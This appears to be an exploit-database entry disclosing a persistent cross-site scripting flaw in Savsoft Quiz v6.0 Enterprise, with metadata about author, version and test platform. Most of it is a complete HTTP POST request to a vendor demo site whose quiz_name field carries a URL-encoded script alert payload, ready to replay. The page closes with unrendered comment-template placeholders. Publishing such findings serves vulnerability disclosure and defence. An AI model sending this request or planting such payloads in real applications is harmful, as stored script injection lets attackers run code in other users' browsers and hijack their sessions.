# Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting # Date: 2024-01-03 # Exploit Author: Eren Sen # Vendor: SAVSOFT QUIZ # Vendor Homepage: https://savsoftquiz.com # Software Link: https://savsoftquiz.com/web/index.php/online-demo/ # Version: < 6.0 # CVE-ID: N/A # Tested on: Kali Linux / Windows 10 # Vulnerabilities Discovered Date : 2024/01/03 # Persistent Cross Site Scripting (XSS) Vulnerability # Vulnerable Parameter Type: POST # Vulnerable Parameter: quiz_name # Proof of Concepts: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13 # HTTP Request: POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1 Host: demos1.softaculous.com Cookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxx Content-Length: 411 Cache-Control: max-age=0 Sec-Ch-Ua: Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "" Upgrade-Insecure-Requests: 1 Origin: https://demos1.softaculous.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_new Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close quiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |